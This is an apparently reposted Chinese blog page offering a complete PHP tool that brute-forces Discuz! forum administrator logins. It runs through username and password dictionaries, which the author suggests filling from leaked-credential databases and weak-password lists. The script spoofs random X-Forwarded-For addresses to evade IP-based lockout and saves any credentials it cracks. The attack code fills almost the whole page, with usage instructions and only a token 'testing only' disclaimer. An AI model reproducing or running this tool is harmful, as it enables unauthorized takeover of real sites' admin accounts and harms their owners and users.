Discuz!后台密码穷举工具 无视IP验证
来源:互联网 发布:js 生成文件 编辑:程序博客网 时间:2024/05/16 17:30
<span style="font-size:18px;">自己写了一个Discuz后台密码穷举工具,无视IP验证,配合社工库和弱口令字典。拿去看看吧</span><span style="line-height: 15px; white-space: pre-wrap; background-color: rgb(255, 255, 255);"></span><?php/**Author : fengxuanDate : 2014-11-25 */class FuckDiscuz{public $userfile;public $passfile;public $outfile;public $url;public function __construct($argv,$argc){$this->init($argv,$argc);$this->crack();}private function init($argv,$argc){if(!isset($argv) || $argc != 7 || $argv[1]!='-v' || $argv[2]!='-o' ) $this->show();$this->userfile = $argv[count($argv)-2];$this->passfile = $argv[count($argv)-1];$this->outfile = $argv[3];$this->url = $argv[count($argv)-3];}private function sock_post($url,$query){$info = parse_url($url);$fp = fsockopen($info['host'],80,$error,$errstr,30);$head = "POST ".$info['path']." HTTP/1.0\r\n";$head .= "HOST: ".$info['host']."\r\n";$head .= "X-Forwarded-For: ".$this->X_Forwarded_for()."\r\n";$head .="Content-type: application/x-www-form-urlencoded\r\n";$head .= "Content-Length: ".strlen(trim($query))."\r\n";$head .= "\r\n";$head .= trim($query);$write = fputs($fp, $head);while (!feof($fp)){$line = fgets($fp);if(preg_match('/HTTP\/1.1 302/i', $line)){ $temp = explode('&', $query); $temp[0] = substr(strstr($temp[0], '='), 1); $temp[1] = substr(strstr($temp[1], '='), 1);echo "\r\n\r\nCongratulations! \r\nThe username is \r\n".$temp[0]." and password is \r\n".$temp[1]."\r\n";$this->savefile($this->outfile, $temp[0] , $temp[1] );}//echo $line."<br>";}}private function X_Forwarded_for(){$xip = rand(1, 255).".".rand(0, 255).".".rand(0, 255).".".rand(1, 254);if (preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {continue;}return $xip;}private function savefile($file,$user,$pass){$fp = fopen($file, 'w+');$string = "username ".$user." password ".$pass."\r\n";fwrite($fp, $string);fclose($fp);}private function crack(){$userfile = file($this->userfile);$passfile = file($this->passfile);$userarr = array();$passarr = array();foreach ($userfile as $user=>$value){$userarr[$user] = $value;foreach ($passfile as $pass=>$value){$passarr[$pass] = $value;$data = array('admin_username'=>$userarr[$user],'admin_password'=>$passarr[$pass],'submit'=>'提交');print "Try crack with: \t".$userarr[$user]." and \t".$passarr[$pass]." \r\n";$data = str_replace('%0D%0A', '',http_build_query($data));$this->sock_post($this->url, $data);}}}private function show(){$string = <<<eof+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++----------Writed by 风炫 Date:2014/11/25------------------++-------如果有能力,即使黑了全世界又如何?------------------++If there are any problems,please contact:978348306@qq.com-++-----we from moon security team blog:www.moonsec.com------++----------------只供测试所用,请勿用于非法用途-------------+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++usage: fuckdz.php <commands> <url> <userfile> <passfile><commands>-v : According to cracking process-o [file] : The output file to saveeg:php.exe fuckdz.php -v -o result.txt http://www.xxx.com/admin.php user.txt pass.txteof;print $string;exit();}}new FuckDiscuz($argv,$argc);?>
</pre>
0 0
- Discuz!后台密码穷举工具 无视IP验证
- Discuz爆破无视验证码
- 有discuz数据库,忘了管理员密码,怎样进后台
- DISCUZ——后台管理密码ko方案
- Discuz X2限制IP、创始人没法进入后台解决
- 验证用户名,手机号,ip地址,邮箱,url,密码,汉字等等的工具类
- Asp.Net 中验证 Discuz 的登录密码
- ecmall后台登录验证,密码加密
- xkou密码穷举类
- 穷举密码算法
- 穷举密码算法
- PHP穷举密码生成
- python 穷举密码
- Python 密码穷举
- discuz获取任意管理员密码漏洞利用工具vbs版
- PHPCMS V9后台密码忘记重置工具
- 无视
- java后台表单验证工具类
- LuaJavaBridge - Lua 与 Java 互操作的简单解决方案
- Java核心技术——多线程
- 聚类算法的学习研究与实现
- solaris 11设置root用户登录
- MBProgressHUD的基本使用
- Discuz!后台密码穷举工具 无视IP验证
- CCLuaObjcBridge - Lua 与 Objective-C 互操作的简单解决方案
- linux信号
- Copy List with Random Pointer
- Ubuntu配置JDK环境变量
- 数据结构与算法JavaScript (一) :栈
- 有用的python库
- 20150129
- Kuangbin Flying 6最小生成树专题